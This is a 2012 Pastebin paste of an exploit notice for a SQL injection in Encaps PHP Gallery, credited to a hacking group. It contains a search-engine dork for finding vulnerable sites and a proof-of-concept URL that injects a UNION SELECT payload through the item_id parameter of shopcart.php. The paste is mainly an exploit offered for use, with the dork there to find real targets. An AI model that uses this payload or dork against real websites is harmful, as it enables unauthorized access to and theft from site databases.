Advertisement
LoginDeniedTD

Encaps PHP Gallery SQL Injection

Mar 16th, 2012
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.80 KB | None | 0 0
  1. # Exploit Title: Encaps PHP Gallery SQL Injection
  2. # Date: 14/03/2012
  3. # Author: Daniel Godoy
  4. # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
  5. # Author Web: www.delincuentedigital.com.ar
  6. # Software: Encaps PHP Gallery
  7. # http://www.encaps.net/software/encapsgallery/
  8. # Tested on: Linux
  9. # Dork: "shopcart.php?action=add&item_id="
  10. [Comment]
  11. Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
  12. Maximiliano Soler
  13. Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
  14. InyeXion,LinuxFer, Scorp
  15. her0, r0dr1 y demas user de RemoteExecution
  16. www.remoteexecution.info www.remoteexcution.com.ar
  17. #RemoteExecution Hacking Group
  18. [PoC]
  19. http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement